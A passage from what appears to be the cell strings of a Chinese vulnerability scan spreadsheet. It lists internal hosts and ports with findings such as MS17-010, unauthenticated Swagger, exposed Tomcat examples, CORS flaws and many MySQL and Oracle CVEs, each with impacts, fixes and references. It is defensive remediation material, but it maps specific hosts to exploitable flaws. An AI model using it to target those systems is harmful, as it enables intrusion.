    <t>修改web服务器配置，添加X-frame-options响应头。赋值有如下三种：（1）DENY：不能被嵌入到任何iframe或frame中。（2）SAMEORIGIN：页面只能被本站页面嵌入到iframe或者frame中。（3）ALLOW-FROM uri：只能被嵌入到指定域名的框架中。也可在代码中加入，在PHP中加入：header('X-Frame-Options: deny');</t>
  </si>
  <si>
    <t>Apache Tomcat examples目录可访问</t>
  </si>
  <si>
    <t>http://172.20.34.70:8030/examples/servlets/servlet/SessionExample</t>
  </si>
  <si>
    <t>可能引发绕过HttpOnly策略窃取Cookie。可能绕过用于防护CSRF的某些Cookie值。可能引发会话篡改和会话被操纵。</t>
  </si>
  <si>
    <t>参见《Apache Tomcat examples目录可访问-修复方案》</t>
  </si>
  <si>
    <t>https://blog.csdn.net/bency/article/details/80747679</t>
  </si>
  <si>
    <t>http://172.20.34.70:10082</t>
  </si>
  <si>
    <t>10082</t>
  </si>
  <si>
    <t>Apache Tomcat 默认错误页 配置不当信息泄露漏洞</t>
  </si>
  <si>
    <t>http://172.20.34.70:8030/docs/</t>
  </si>
  <si>
    <t>未删除默认错误页的服务都将受到影响。</t>
  </si>
  <si>
    <t>参见《Apache Tomcat 默认错误页 配置不当信息泄露漏洞-修复方案》</t>
  </si>
  <si>
    <t>https://wiki.apache.org/tomcat/FAQ/Miscellaneous#Q6</t>
  </si>
  <si>
    <t>Swagger 未授权访问漏洞</t>
  </si>
  <si>
    <t>http://172.20.34.70:19080/swagger-ui.html#/api-memory-controller</t>
  </si>
  <si>
    <t>1.配置Swagger开启页面访问限制。2.排查接口是否存在敏感信息泄露（例如：账号密码、SecretKey、OSS配置等），若有则进行相应整改。</t>
  </si>
  <si>
    <t>https://swagger.io/docs/</t>
  </si>
  <si>
    <t>general 未设置cookie的Secure标志位</t>
  </si>
  <si>
    <t>影响所有Set-Cookie消息头中未设置可选属性Secure的系统</t>
  </si>
  <si>
    <t>参见《general 未设置cookie的Secure标志位-修复方案》</t>
  </si>
  <si>
    <t>http://172.20.34.70:9000</t>
  </si>
  <si>
    <t>9000</t>
  </si>
  <si>
    <t>OPTIONS方法启用</t>
  </si>
  <si>
    <t>http://172.20.34.70:80/</t>
  </si>
  <si>
    <t>OPTIONS方法可能会公开敏感信息，这些信息可能有助于恶意用户准备更高级的攻击。</t>
  </si>
  <si>
    <t>参见《OPTIONS方法启用-修复方案》</t>
  </si>
  <si>
    <t>https://www.owasp.org/index.php/Testing_for_HTTP_Methods_and_XST_(OWASP-CM-008)</t>
  </si>
  <si>
    <t>X11服务 未授权访问(CVE-1999-0526)</t>
  </si>
  <si>
    <t>6000</t>
  </si>
  <si>
    <t>已修复</t>
  </si>
  <si>
    <t>任意用户可以连接到服务器上。</t>
  </si>
  <si>
    <t>使用’xhost’命令限制对此端口的访问。 如果未使用X11客户端/服务器工具，请完全禁用TCP。</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-199707-001</t>
  </si>
  <si>
    <t>http://172.20.34.70:8030/</t>
  </si>
  <si>
    <t>http://172.20.34.80:80</t>
  </si>
  <si>
    <t>http://172.20.34.80:19850</t>
  </si>
  <si>
    <t>19850</t>
  </si>
  <si>
    <t>http://172.20.34.80:8120</t>
  </si>
  <si>
    <t>8120</t>
  </si>
  <si>
    <t>http://172.20.34.80:8121</t>
  </si>
  <si>
    <t>8121</t>
  </si>
  <si>
    <t>http://172.20.34.80:8120/</t>
  </si>
  <si>
    <t>http://172.20.34.80:8121/</t>
  </si>
  <si>
    <t>http://172.20.34.80:19850/swagger-ui.html#/api-memory-controller</t>
  </si>
  <si>
    <t>http://172.20.34.80:19850/</t>
  </si>
  <si>
    <t>http://172.20.34.80:80/</t>
  </si>
  <si>
    <t>http://172.20.34.78:80</t>
  </si>
  <si>
    <t>http://172.20.34.78:9190</t>
  </si>
  <si>
    <t>9190</t>
  </si>
  <si>
    <t>http://172.20.34.78:9992</t>
  </si>
  <si>
    <t>9992</t>
  </si>
  <si>
    <t>http://172.20.34.78:9993</t>
  </si>
  <si>
    <t>9993</t>
  </si>
  <si>
    <t>http://172.20.34.78:9994</t>
  </si>
  <si>
    <t>9994</t>
  </si>
  <si>
    <t>http://172.20.34.78:9993/</t>
  </si>
  <si>
    <t>http://172.20.34.78:9996</t>
  </si>
  <si>
    <t>9996</t>
  </si>
  <si>
    <t>http://172.20.34.78:9995</t>
  </si>
  <si>
    <t>9995</t>
  </si>
  <si>
    <t>http://172.20.34.78:9991</t>
  </si>
  <si>
    <t>9991</t>
  </si>
  <si>
    <t>http://172.20.34.78:8019/v2/api-docs</t>
  </si>
  <si>
    <t>8019</t>
  </si>
  <si>
    <t>CORS(跨站资源共享)原始验证失败</t>
  </si>
  <si>
    <t>http://172.20.34.78:9992/</t>
  </si>
  <si>
    <t>1、获取用户数据,2、客户端缓存中毒：这种配置允许攻击者利用其他的漏洞，更改没有验证的字段，看是否正常回显。比如，一个应用返回数据报文头部中包含“X-User”这个字段，这个字段的值没有经过验证就直接输出到返回页面上，此时就可以结合XSS漏洞来利用,3、服务端缓存中毒：利用CORS的错误配置注入HTTP头部，这可能会被服务器端缓存下来，比如制造存储型xss</t>
  </si>
  <si>
    <t>参见《CORS(跨站资源共享)原始验证失败-修复方案》</t>
  </si>
  <si>
    <t>https://blog.csdn.net/lza20001103/article/details/146536776</t>
  </si>
  <si>
    <t>http://172.20.34.78:9995/</t>
  </si>
  <si>
    <t>http://172.20.34.78:80/</t>
  </si>
  <si>
    <t>http://172.20.34.78:9994/</t>
  </si>
  <si>
    <t>http://172.20.34.78:9996/</t>
  </si>
  <si>
    <t>http://172.20.34.78:9991/</t>
  </si>
  <si>
    <t>443</t>
  </si>
  <si>
    <t>使用弱哈希算法签名的SSL证书(CVE-2004-2761)</t>
  </si>
  <si>
    <t>攻击者可以利用这一点生成另一个具有相同数字签名的证书，从而允许攻击者伪装成受影响的服务。</t>
  </si>
  <si>
    <t>参见《使用弱哈希算法签名的SSL证书(CVE-2004-2761)-修复方案》</t>
  </si>
  <si>
    <t>https://blog.csdn.net/weixin_40133285/article/details/124406356</t>
  </si>
  <si>
    <t>1433</t>
  </si>
  <si>
    <t>3938</t>
  </si>
  <si>
    <t>MS14-044：SQL Server 中的漏洞可允许权限提升 (2984340)</t>
  </si>
  <si>
    <t>该漏洞可导致远程攻击者权限提升。</t>
  </si>
  <si>
    <t>Microsoft 已发布一系列用于 SQL Server 2008、2008 R2、2012 和2014 的修补程序。</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2014/ms14-044
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201408-182,CNNVD-201408-210
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201408-182,CNNVD-201408-210</t>
  </si>
  <si>
    <t>MS15-058：SQL Server 上的漏洞可允许远程代码执行</t>
  </si>
  <si>
    <t>存在因指针转换到错误类而导致的权限升级漏洞。经过认证的远程攻击者可利用此漏洞通过特别构建的 SQL 查询实现权限升级。(CVE-2015-1761), , - 存在远程代码执行漏洞，原因是未能正确处理对未初始化内存的内部函数调用。攻击者可利用此问题在已启用特殊权限设置（如 VIEW SERVER STATE）的受影响 SQL 服务器中，特别构建 SQL 查询，以执行任意代码。, ,  (CVE-2015-1762), , - 存在远程代码执行漏洞，原因是未能正确处理对未初始化内存的内部函数调用。经过认证的远程攻击者可以利用此缺陷，通过特别构建的 SQL 查询，从错误地址执行虚拟函数，以执行任意代码。(CVE-2015-1762)</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2015/ms15-058
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201507-424,CNNVD-201507-426,CNNVD-201507-425</t>
  </si>
  <si>
    <t>MS17-010：Microsoft Windows SMB 服务器的安全更新</t>
  </si>
  <si>
    <t>ips-10010418, ips-10010417, ips-10010416, ips-10010415, ips-10010414, ips-10010413, ips-10010412, ips-10010411, ips-10010410, ips-10010299, ips-10010258, ips-10010244, ips-10010238, ips-10010236（有效）</t>
  </si>
  <si>
    <t>445</t>
  </si>
  <si>
    <t>急需修复</t>
  </si>
  <si>
    <t>未经身份验证的攻击者可利用此问题执行任意代码或获取敏感信息。</t>
  </si>
  <si>
    <t>参见《MS17-010：Microsoft Windows SMB 服务器的安全更新-修复方案》</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2017/ms17-010
https://support.microsoft.com/en-us/help/2696547/detect-enable-disable-smbv1-smbv2-smbv3-in-windows-and-windows-server
https://www.theregister.co.uk/2017/01/18/uscert_warns_admins_to_kill_smb_after_shadow_brokers_dump/
https://www.us-cert.gov/ncas/current-activity/2017/01/16/SMB-Security-Best-Practices
https://msrc-blog.microsoft.com/2017/04/14/protecting-customers-and-evaluating-risk/
https://www.tenable.com/blog/petyanotpetya-ransomware-detection-for-the-modern-enterprise</t>
  </si>
  <si>
    <t>DNS服务器欺骗请求扩增D 拒绝服务漏洞(CVE-2006-0987)</t>
  </si>
  <si>
    <t>ips-11050076（无效）</t>
  </si>
  <si>
    <t>53</t>
  </si>
  <si>
    <t>远程攻击者可以利用这种“放大”对使用远程DNS服务器的第三方主机发起拒绝服务攻击。</t>
  </si>
  <si>
    <t>参见《DNS服务器欺骗请求扩增D 拒绝服务漏洞(CVE-2006-0987)-修复方案》</t>
  </si>
  <si>
    <t>https://www.cnblogs.com/ikai/p/14928336.html</t>
  </si>
  <si>
    <t>Microsoft Windows SMBv1 多个漏洞</t>
  </si>
  <si>
    <t>影响已启用 Microsoft Server Message Block 1.0 (SMBv1)的远程 Windows 主机</t>
  </si>
  <si>
    <t>参见《Microsoft Windows SMBv1 多个漏洞-修复方案》</t>
  </si>
  <si>
    <t>https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0268
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0278
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0273
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0275
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0277
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0280
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0274
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0272
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0270
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0271
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0276
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0279</t>
  </si>
  <si>
    <t>SSL/TLS Diffie-Hellman Module &lt;= 1024 位 (Logjam)(CVE-2015-4000)</t>
  </si>
  <si>
    <t>允许攻击者恢复明文或可能违反连接的完整性。</t>
  </si>
  <si>
    <t>参见《SSL_TLS Diffie-Hellman Module _= 1024 位 (Logjam)(CVE-2015-4000)-修复方案》</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201505-428</t>
  </si>
  <si>
    <t>1158</t>
  </si>
  <si>
    <t>SSL/TLS 支持 EXPORT_DHE &lt;= 512 位出口级加密套件 (Logjam)(CVE-2015-4000)</t>
  </si>
  <si>
    <t>中间人攻击者可能会降级会话以使用 EXPORT_DHE 加密套件。</t>
  </si>
  <si>
    <t>重新配置服务以删除对 EXPORT_DHE 加密套件的支持。</t>
  </si>
  <si>
    <t>https://weakdh.org/
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201505-428
http://www.securityfocus.com/bid/74733
http://www.securityfocus.com/bid/91787</t>
  </si>
  <si>
    <t>Oracle MySQL Server组件访问控制错误漏洞 (CVE-2019-2731)</t>
  </si>
  <si>
    <t>3306</t>
  </si>
  <si>
    <t>mysql: 5.6.515</t>
  </si>
  <si>
    <t>影响mysql:5.7.23以下版本(含)</t>
  </si>
  <si>
    <t>目前厂商已发布升级补丁以修复漏洞，请访问官方网站下载补丁或升级到最新版本以修复漏洞。</t>
  </si>
  <si>
    <t>http://www.oracle.com/index.html
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201907-956
http://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2731
https://www.cnvd.org.cn/flaw/show/CNVD-2019-26527</t>
  </si>
  <si>
    <t>Oracle MySQL Server 安全漏洞(CVE-2020-14553)</t>
  </si>
  <si>
    <t>影响mysql:5.7.30以下版本(含),8.0.0版本(含)到8.0.20版本(含)</t>
  </si>
  <si>
    <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接：
https://www.oracle.com/security-alerts/cpujul2020.html</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-202007-705
https://access.redhat.com/errata/RHSA-2020:3518
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2911</t>
  </si>
  <si>
    <t>Oracle MySQL Server 安全漏洞(CVE-2020-14869)</t>
  </si>
  <si>
    <t>影响mysql:5.7.31以下版本(含),8.0.0版本(含)到8.0.21版本(含)</t>
  </si>
  <si>
    <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接：
https://www.oracle.com/security-alerts/cpuoct2020.html</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-202010-940</t>
  </si>
  <si>
    <t>Oracle MySQL Server 输入验证错误漏洞(CVE-2021-2356)</t>
  </si>
  <si>
    <t>影响mysql:5.0.0版本(含)到5.7.34版本(含),8.0.0版本(含)到8.0.25版本(含)</t>
  </si>
  <si>
    <t>厂商补丁:https://www.oracle.com/security-alerts/cpujul2021.html。</t>
  </si>
  <si>
    <t>https://www.oracle.com/security-alerts/cpujul2021.html
https://ubuntu.com/security/notices/USN-5022-1</t>
  </si>
  <si>
    <t>Oracle MySQL Server远程安全漏洞(CVE-2017-10296)</t>
  </si>
  <si>
    <t>Oracle MySQL Server ≤5.7.18</t>
  </si>
  <si>
    <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接：http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html</t>
  </si>
  <si>
    <t>http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html
https://sec.sangfor.com.cn/security-vulnerability/detail?vuln_sfv=SF_2020_31330&amp;lang=ZH-CN</t>
  </si>
  <si>
    <t>Oracle MySQL Server远程安全漏洞(CVE-2017-10165)</t>
  </si>
  <si>
    <t>Oracle MySQL Server≤ 5.7.19 (inclusive)</t>
  </si>
  <si>
    <t>https://security.netapp.com/advisory/ntap-20171019-0002/
http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html
http://www.securitytracker.com/id/1039597
https://access.redhat.com/errata/RHSA-2017:3442
https://sec.sangfor.com.cn/security-vulnerability/detail?vuln_sfv=SF_2020_31335&amp;lang=ZH-CN</t>
  </si>
  <si>
    <t>Oracle MySQL Server远程安全漏洞(CVE-2017-3529)</t>
  </si>
  <si>
    <t>Oracle MySQL Server≤5.7.18</t>
  </si>
  <si>
    <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接：http://www.oracle.com/technetwork/security-advisory/cpujul2017-3236622.html</t>
  </si>
  <si>
    <t>http://www.oracle.com/technetwork/security-advisory/cpujul2017-3236622.html
http://www.securitytracker.com/id/1038928
https://access.redhat.com/errata/RHSA-2017:2886
https://sec.sangfor.com.cn/security-vulnerability/detail?vuln_sfv=SF_2020_31358&amp;lang=ZH-CN</t>
  </si>
  <si>
    <t>Oracle MySQL Server远程安全漏洞(CVE-2017-10313)</t>
  </si>
  <si>
    <t>Oracle MySQL Server≤5.7.19</t>
  </si>
  <si>
    <t>http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html
https://sec.sangfor.com.cn/security-vulnerability/detail?vuln_sfv=SF_2020_31328&amp;lang=ZH-CN</t>
  </si>
  <si>
    <t>Oracle MySQL Server拒绝服务漏洞(CVE-2017-3459)</t>
  </si>
  <si>
    <t>Oracle MySQL Server≤5.7.17</t>
  </si>
  <si>
    <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：http://www.oracle.com/technetwork/security-advisory/cpuapr2017-3236618.html</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</si>
  <si>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https://sec.sangfor.com.cn/security-vulnerability/detail?vuln_sfv=SF_2020_34227&amp;lang=ZH-CN</t>
  </si>
  <si>
    <t>Oracle MySQL Server远程安全漏洞(CVE-2017-3637)</t>
  </si>
  <si>
    <t>http://www.oracle.com/technetwork/security-advisory/cpujul2017-3236622.html
http://www.securitytracker.com/id/1038928
https://access.redhat.com/errata/RHSA-2017:2886
https://sec.sangfor.com.cn/security-vulnerability/detail?vuln_sfv=SF_2020_31355&amp;lang=ZH-CN</t>
  </si>
  <si>
    <t>Oracle MySQL Server组件安全漏洞(CVE-2017-3465)</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</si>
  <si>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https://sec.sangfor.com.cn/security-vulnerability/detail?vuln_sfv=SF_2020_34410&amp;lang=ZH-CN</t>
  </si>
  <si>
    <t>Oracle MySQL Server远程安全漏洞(CVE-2017-3638)</t>
  </si>
  <si>
    <t>http://www.oracle.com/technetwork/security-advisory/cpujul2017-3236622.html
http://www.securitytracker.com/id/1038928
https://access.redhat.com/errata/RHSA-2017:2886
https://sec.sangfor.com.cn/security-vulnerability/detail?vuln_sfv=SF_2020_31325&amp;lang=ZH-CN</t>
  </si>
  <si>
    <t>Oracle MySQL Server远程安全漏洞(CVE-2017-3639)</t>
  </si>
  <si>
    <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接:https://www.oracle.com/security-alerts/</t>
  </si>
  <si>
    <t>http://www.oracle.com/technetwork/security-advisory/cpujul2017-3236622.html
http://www.securitytracker.com/id/1038928
https://access.redhat.com/errata/RHSA-2017:2886
https://sec.sangfor.com.cn/security-vulnerability/detail?vuln_sfv=SF_2020_31324&amp;lang=ZH-CN</t>
  </si>
  <si>
    <t>Oracle MySQL 输入验证错误漏洞(CVE-2022-21427)</t>
  </si>
  <si>
    <t>影响mysql:5.0.0版本(含)到5.7.37版本(含),8.0.0版本(含)到8.0.28版本(含)</t>
  </si>
  <si>
    <t>厂商补丁: 目前厂商已发布升级补丁以修复漏洞，补丁获取链接：  https://www.oracle.com/security-alerts/cpuapr2022.html</t>
  </si>
  <si>
    <t>Oracle MySQL 输入验证错误漏洞(CVE-2022-21451)</t>
  </si>
  <si>
    <t>Oracle MySQL 输入验证错误漏洞(CVE-2022-21454)</t>
  </si>
  <si>
    <t>Oracle MySQL curl安全漏洞(CVE-2022-43551)</t>
  </si>
  <si>
    <t>影响mysql:8.0.0版本(含)到 8.0.32版本(含),5.0版本(含)到 5.7.41版本(含)</t>
  </si>
  <si>
    <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接https://www.oracle.com/security-alerts/cpuapr2023.html</t>
  </si>
  <si>
    <t>https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-43551</t>
  </si>
  <si>
    <t>Oracle MySQL 安全漏洞(CVE-2023-22007)</t>
  </si>
  <si>
    <t>影响MySQL:8.0.0版本(含)到8.0.32版本(含),5.0版本(含)到5.7.41版本(含)</t>
  </si>
  <si>
    <t>厂商补丁:目前厂商已发布升级补丁以修复漏洞，补丁获取链接：https://www.oracle.com/security-alerts/cpujul2023.html</t>
  </si>
  <si>
    <t>Oracle MySQL 安全漏洞(CVE-2023-22028)</t>
  </si>
  <si>
    <t>影响MySQL:8.0.0版本(含)到8.0.31版本(含),5.0版本(含)到5.7.43版本(含)</t>
  </si>
  <si>
    <t>厂商补丁:目前厂商已发布升级补丁以修复漏洞，补丁获取链接：https://www.oracle.com/security-alerts/cpuoct2023.html</t>
  </si>
  <si>
    <t>Oracle MySQL 安全漏洞(CVE-2023-22053)</t>
  </si>
  <si>
    <t>影响MySQL:8.0.0版本(含)到8.0.33版本(含),5.0版本(含)到5.7.42版本(含)</t>
  </si>
  <si>
    <t>Oracle MySQL curl/libcURL 安全漏洞(CVE-2023-38546)</t>
  </si>
  <si>
    <t>影响mysql:8.0.0版本(含)到 8.0.34版本(含),5.0版本(含)到 5.7.43版本(含),8.1.0版本</t>
  </si>
  <si>
    <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接:https://www.oracle.com/security-alerts/cpuoct2023.html</t>
  </si>
  <si>
    <t>https://www.oracle.com/</t>
  </si>
  <si>
    <t>Oracle Database Server 远程安全漏洞 (CVE-2016-6814)</t>
  </si>
  <si>
    <t>Oracle: 12.2.0.1</t>
  </si>
  <si>
    <t>影响oracle:12.2.0.1版本</t>
  </si>
  <si>
    <t>Oracle Database Server Spatial 组件空指针引用拒绝服务漏洞(CVE-2016-9572)</t>
  </si>
  <si>
    <t>影响oracle:12.2.0.1版本,18.0.0.0版本(含)到19.0.0.0版本</t>
  </si>
  <si>
    <t>Oracle Database Server WLM (Apache Tomcat) 组件安全漏洞(CVE-2018-11784)</t>
  </si>
  <si>
    <t>ips-11020689, ips-11020690（无效）</t>
  </si>
  <si>
    <t>影响oracle:18.0.0.0版本(含)到20.0.0.0版本,12.2.0.1版本</t>
  </si>
  <si>
    <t>Oracle MySQL Server 安全漏洞(CVE-2020-14576)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-202007-730
https://access.redhat.com/errata/RHSA-2020:3518
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2911</t>
  </si>
  <si>
    <t>Oracle MySQL Server 安全漏洞(CVE-2020-14567)</t>
  </si>
  <si>
    <t>影响mysql:5.7.29以下版本(含),8.0.0版本(含)到8.0.19版本(含)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-202007-714
https://access.redhat.com/errata/RHSA-2020:3518
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2911</t>
  </si>
  <si>
    <t>Oracle MySQL SSL证书验证安全限制绕过漏洞(CVE-2015-3152)</t>
  </si>
  <si>
    <t>影响MySQL: 5.7.2及之前版本</t>
  </si>
  <si>
    <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：http://www.mysql.com/https://jira.mariadb.org/browse/MDEV-7937</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201505-333
http://www.securitytracker.com/id/1032216</t>
  </si>
  <si>
    <t>Oracle MySQL Server组件安全漏洞(CVE-2016-5628)</t>
  </si>
  <si>
    <t>Oracle MySQL Server≤5.7.13</t>
  </si>
  <si>
    <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：http://www.oracle.com/technetwork/security-advisory/cpuoct2016-2881722.html</t>
  </si>
  <si>
    <t>https://dev.mysql.com/doc/relnotes/mysql/5.7/en/news-5-7-14.html
https://www.oracle.com/technetwork/security-advisory/cpuoct2016-2881722.html
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201610-535
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201610-632
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201610-533
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201610-639
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201610-532
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201610-609
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201610-554
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201610-510
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201610-522
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201610-642
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201610-605
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201610-650
https://sec.sangfor.com.cn/security-vulnerability/detail?vuln_sfv=SF_2020_33676&amp;lang=ZH-CN</t>
  </si>
  <si>
    <t>Oracle MySQL Server 安全漏洞(CVE-2017-3454)</t>
  </si>
  <si>
    <t>Oracle MySQL Server &lt;5.7.17</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</si>
  <si>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https://sec.sangfor.com.cn/security-vulnerability/detail?vuln_sfv=SF_2020_33899&amp;lang=ZH-CN</t>
  </si>
  <si>
    <t>Oracle MySQL Server远程安全漏洞(CVE-2017-10284)</t>
  </si>
  <si>
    <t>http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html
https://sec.sangfor.com.cn/security-vulnerability/detail?vuln_sfv=SF_2020_31332&amp;lang=ZH-CN</t>
  </si>
  <si>
    <t>Oracle MySQL Server/MariaDB远程安全漏洞(CVE-2017-10320)</t>
  </si>
  <si>
    <t>Oracle MySQL Server≤ 5.7.19</t>
  </si>
  <si>
    <t>厂商补丁:Oracle------Oracle已经为此发布了一个安全公告（cpuoct2017-3236626）以及相应补丁:cpuoct2017-3236626：Oracle Critical Patch Update Advisory - Oct 2017链接：http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.htmlhttps://mariadb.com/kb/en/security/</t>
  </si>
  <si>
    <t>http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html
https://sec.sangfor.com.cn/security-vulnerability/detail?vuln_sfv=SF_2020_31326&amp;lang=ZH-CN</t>
  </si>
  <si>
    <t>Oracle MySQL Server远程安全漏洞(CVE-2017-3640)</t>
  </si>
  <si>
    <t>http://www.oracle.com/technetwork/security-advisory/cpujul2017-3236622.html
http://www.securitytracker.com/id/1038928
https://access.redhat.com/errata/RHSA-2017:2886
https://sec.sangfor.com.cn/security-vulnerability/detail?vuln_sfv=SF_2020_31323&amp;lang=ZH-CN</t>
  </si>
  <si>
    <t>Oracle MySQL Server远程安全漏洞(CVE-2017-3645)</t>
  </si>
  <si>
    <t>http://www.oracle.com/technetwork/security-advisory/cpujul2017-3236622.html
http://www.securitytracker.com/id/1038928
https://access.redhat.com/errata/RHSA-2017:2886
https://sec.sangfor.com.cn/security-vulnerability/detail?vuln_sfv=SF_2020_31319&amp;lang=ZH-CN</t>
  </si>
  <si>
    <t>MySQL缓冲区错误漏洞(CVE-2019-5436)</t>
  </si>
  <si>
    <t>MySQL &lt;= 5.7.278.0.0 &lt;= MySQL &lt;= 8.0.17</t>
  </si>
  <si>
    <t>https://nvd.nist.gov/vuln/detail/CVE-2019-5436
https://www.oracle.com/security-alerts/</t>
  </si>
  <si>
    <t>Oracle MySQL 输入验证错误漏洞(CVE-2022-21460)</t>
  </si>
  <si>
    <t>Oracle MySQL zlib 组件输入验证错误漏洞(CVE-2018-25032)</t>
  </si>
  <si>
    <t>影响mysql:5.7.38以下版本(含),8.0.0版本(含)到8.0.29版本(含)</t>
  </si>
  <si>
    <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接： https://www.oracle.com/security-alerts/cpujul2022.html</t>
  </si>
  <si>
    <t>https://www.oracle.com/security-alerts/cpujul2022.html</t>
  </si>
  <si>
    <t>Oracle MySQL 安全漏洞(CVE-2023-21980)</t>
  </si>
  <si>
    <t>https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-21980</t>
  </si>
  <si>
    <t>Oracle MySQL Server curl/libcURL 安全漏洞(CVE-2023-22084)</t>
  </si>
  <si>
    <t>影响MySQL:8.0.0版本(含)到8.0.34版本(含),5.0版本(含)到5.7.43版本(含),8.1.0版本</t>
  </si>
  <si>
    <t>Oracle MySQL Server 安全漏洞(CVE-2023-22015)</t>
  </si>
  <si>
    <t>影响MySQL:8.0.0版本(含)到8.0.31版本(含),5.0版本(含)到5.7.42版本(含)</t>
  </si>
  <si>
    <t>Oracle MySQL curl/libcURL 安全漏洞(CVE-2023-38545)</t>
  </si>
  <si>
    <t>Oracle Database Server 安全漏洞(CVE-2016-1000031)</t>
  </si>
  <si>
    <t>ips-12031379（无效）</t>
  </si>
  <si>
    <t>影响oracle:12.2.0.1版本,18.0.0.0版本(含)到20.0.0.0版本</t>
  </si>
  <si>
    <t>厂商补丁:Oracle------------目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：https://www.oracle.com/security-alerts/cpujul2020.html</t>
  </si>
  <si>
    <t>Oracle MySQL Server Server Optimizer 安全漏洞(CVE-2020-14760)</t>
  </si>
  <si>
    <t>影响mysql:5.7.31以下版本(含)</t>
  </si>
  <si>
    <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接：https://www.oracle.com/security-alerts/cpuoct2020.html</t>
  </si>
  <si>
    <t>Oracle MySQL Server 拒绝服务漏洞(CVE-2016-5635)</t>
  </si>
  <si>
    <t>Oracle MySQL ≤5.7.13</t>
  </si>
  <si>
    <t>https://dev.mysql.com/doc/relnotes/mysql/5.7/en/news-5-7-14.html
https://www.oracle.com/technetwork/security-advisory/cpuoct2016-2881722.html
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201610-535
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201610-632
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201610-533
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201610-639
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201610-532
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201610-609
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201610-554
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201610-510
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201610-522
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201610-642
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201610-605
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201610-650
